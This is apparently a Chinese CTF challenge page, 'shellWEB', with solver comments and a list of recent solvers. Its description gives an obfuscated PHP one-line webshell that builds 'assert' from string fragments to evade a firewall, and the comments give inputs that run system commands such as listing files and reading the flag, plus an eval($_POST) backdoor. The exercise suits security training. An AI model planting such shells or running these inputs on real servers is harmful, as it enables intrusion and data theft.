shellWEB 未解决

分数: 25 金币: 3
题目作者: harry
一  血: dotast
一血奖励: 1金币
解  决: 8724
提  示:
描  述:
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])
评论
zxmals 4年前

assert($_GET['s']) 这就是一句话过狗

回复 0

answer 4年前

就离谱 ?system(dir) .........文件名真不错,爱了爱了

回复 0

iFound 4年前

重点是描述的话,然后是小马用GET构造请求

回复 0

god536 4年前

/?s=system('cat fla*')

回复 4

a2cai 4年前

?我还以为作者要整条狗来看门呢,结果直接$_GET['s']=system('ls')就啥都出来了......

回复 0

ximing 4年前

根据描述应该应该是一个一句话木马,直接提交命令system(ls),然后在直接访问flag文件

回复 0

shan 4年前

用system(dir)来过这个题目,是作者本来的思路吗。看评论好像大家用的方法还挺多种的。

回复 0

yinyue 4年前

不多说了,套娃了解下

回复 1

eleven 5年前

?s=system("cat *.txt")

回复 0

naihe567 5年前

没法用POST的webshell,可以自己创建一个命令执行eval($_POST[‘xxx’]) 密码xxx

回复 1

WriteUp

image
harry

3 金币

评分(10)

解题动态

liyimanfan 攻破了该题 1小时前
qn9301 攻破了该题 12小时前
wsx68696 攻破了该题 12小时前
atctf 攻破了该题 12小时前
lipingctf 攻破了该题 13小时前
cykai999 攻破了该题 17小时前
河马 攻破了该题 21小时前
jvfnvd.vl 攻破了该题 22小时前
xong_bai 攻破了该题 1天前
999哲111 攻破了该题 1天前
qianhuan 攻破了该题 1天前
15620346617 攻破了该题 2天前
3145145 攻破了该题 2天前
gc 攻破了该题 2天前
Warp 攻破了该题 3天前
bugku0521 攻破了该题 3天前
1606143712 攻破了该题 3天前
zrlht 攻破了该题 3天前
多米今天犯错了没 攻破了该题 3天前
kramin 攻破了该题 3天前
问题反馈